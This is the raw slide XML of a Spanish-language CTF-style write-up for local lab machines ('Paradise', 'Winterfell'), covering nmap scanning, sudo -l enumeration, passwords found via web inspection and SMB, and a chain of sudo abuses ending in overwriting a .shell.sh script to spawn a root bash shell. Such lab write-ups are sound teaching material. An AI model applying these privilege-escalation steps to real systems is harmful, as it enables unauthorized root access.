          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sudo -l</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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s-E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s-ES" dirty="0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054D98A1-B05E-4BE9-BA91-AA376167006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294122" y="2057399"/>
            <a:ext cx="3330388" cy="1387035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AB7E014D-0A91-4F38-A70B-8CF0106B88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4122" y="3610316"/>
            <a:ext cx="3599049" cy="1816996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DD4B5732-B981-48F6-9868-88B3D5EC7C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4122" y="5566300"/>
            <a:ext cx="5401524" cy="646232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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A3D8C2A6-DC9F-4A9B-9B59-69E1124569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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>31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470170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DF1083-CFF9-4B7E-A583-B657BC197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b="1" dirty="0" err="1"/>
              <a:t>ssh@daenerys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t> 172.17.0.2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1A5EDC1-1064-4D25-AFCE-773A83B2CBF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r>
              <a:rPr lang="es-ES" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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 forma que editamos el .shell.sh.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ES" sz="1200" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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&gt;/home/daenerys/.secret/.shell.sh</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200" b="1" i="1" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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ES" sz="1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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#!/bin/bash</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200" b="1" i="1" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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ES" sz="1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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–i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ES" sz="1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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EOF</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200" b="1" i="1" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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#!: Es la línea </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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shebang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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 Se coloca como primera línea del script.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="1000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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s-ES" sz="1000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Indica qué intérprete usar. En este caso, /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-i: lanza un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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interactivo (-i es interactive).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ES" sz="1000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Lo ejecutamos como sudo desde </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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daenerys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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ES" sz="1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sudo /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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/home/daenerys/.secret/.shell.sh</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200" b="1" i="1" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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19CFCD93-D613-4DDD-8E03-AC9E8A34400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080760" y="3196541"/>
            <a:ext cx="4754563" cy="776255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682031E1-3184-422A-8D03-5EBD8BB171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0760" y="4355547"/>
            <a:ext cx="5401524" cy="536494"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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3DC386B-FDE6-4A68-A3FD-F434154FD3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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>32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672820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8FCB85-EA0F-4A30-9E4F-A63F5F579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ES" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529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CVSS Paradise</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529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s-ES" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529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s-ES" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529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Common</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529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b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529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Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529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b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529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Scoring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529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b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529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System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529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).</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES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52541F3-1373-411F-885C-35776B9DBA5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r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Caracteres con dirección al inspeccionar la web (lo que nos lleva a la contraseña de lucas): </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1600" dirty="0">
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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s-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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lucas con permisos para ejecutar sudo como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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andy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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(visto con sudo -l):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1600" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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s-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Ejecutar como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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andy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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s-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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privileged_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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(Este modo es esencial para que los administradores configuren y gestionen el equipo, y debe ser protegido con una contraseña para evitar el acceso no autorizado.) para ascender a root:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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AD4CE0E4-F467-4E58-A9E5-6818D891C42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867438" y="2109589"/>
            <a:ext cx="3030071" cy="1486156"/>
          </a:xfr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17E92041-9FEF-4560-A03C-7E9EE3D0E8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2402" y="3595745"/>
            <a:ext cx="3030071" cy="1502863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8B55DB63-33C7-4F03-BF12-F97FD88195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2125" y="5103856"/>
            <a:ext cx="3045312" cy="1474479"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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9D8D0D9-67D9-448D-BFA1-02FADCA9FA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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>33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072826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DEC290-290E-4D16-97EE-9D56E296C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b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529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CVSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529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Winterfell</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529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s-ES" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529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s-ES" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529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Common</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529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b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529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Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529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b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529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Scoring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529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b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529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System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529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).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54ECDBB-922E-461A-ADC6-4D3D1C9EF4D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s-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Localización de la dirección web a través de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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 lo que nos lleva a las contraseñas de jon en el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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y el su usuario del sistema:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Desde jon, ejecutamos como aria el sudo (esta disponible desde sudo -l el .mensaje.py):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Desde aria, ejecutamos como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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daenerys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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el sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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(sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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 visto en sudo -l):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Desde </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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daenerys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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 ejecutamos como sudo root el .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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(lo vemos a través de sudo -l):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p: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263B1930-8850-4E87-9C97-A41CA5FF295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897880" y="1965960"/>
            <a:ext cx="2757191" cy="1356360"/>
          </a:xfr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48821806-856E-42F8-83A8-016C2FBD57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70224" y="1965960"/>
            <a:ext cx="2775949" cy="135636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12650774-25E4-473C-A4B3-0975F264E9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97880" y="3535681"/>
            <a:ext cx="2807397" cy="1356360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0E854499-312A-4520-A1B5-5572ABA320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70224" y="3535681"/>
            <a:ext cx="2807255" cy="1356360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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B2B3210D-F4A1-4EAA-9D55-C960581089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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>34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808879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9D916B-E280-4970-8F90-C8F0F064F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b="1" dirty="0"/>
              <a:t>Instrucciones de uso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15A59D3-67AC-4118-9D59-9814D746779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s-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Se descarga un zip que descomprimir, resultante en dos únicos archivos:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Un auto_deploy.sh y un [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Nombre_VM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Se ejecutan juntos mediante </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> con permisos de sudo;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> auto_deploy.sh paradise.tar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Se despliega la máquina, siempre la IP es </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>172.17.0.2.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4F01C9EE-9685-4740-9FCC-F7B6EDDD1AB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267450" y="2188056"/>
            <a:ext cx="4754563" cy="3761412"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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646A3C3-FA27-4A94-8943-7A8D82577E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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77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149258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8393B5-A426-4007-8D3A-276ADE166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b="1" dirty="0"/>
              <a:t>Reconocimiento de Puertos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E15549A-83B1-4225-8AEB-8BFDAD0C48A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s-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Reconocimiento de puertos abiertos.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –p- --open 172.17,0,2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
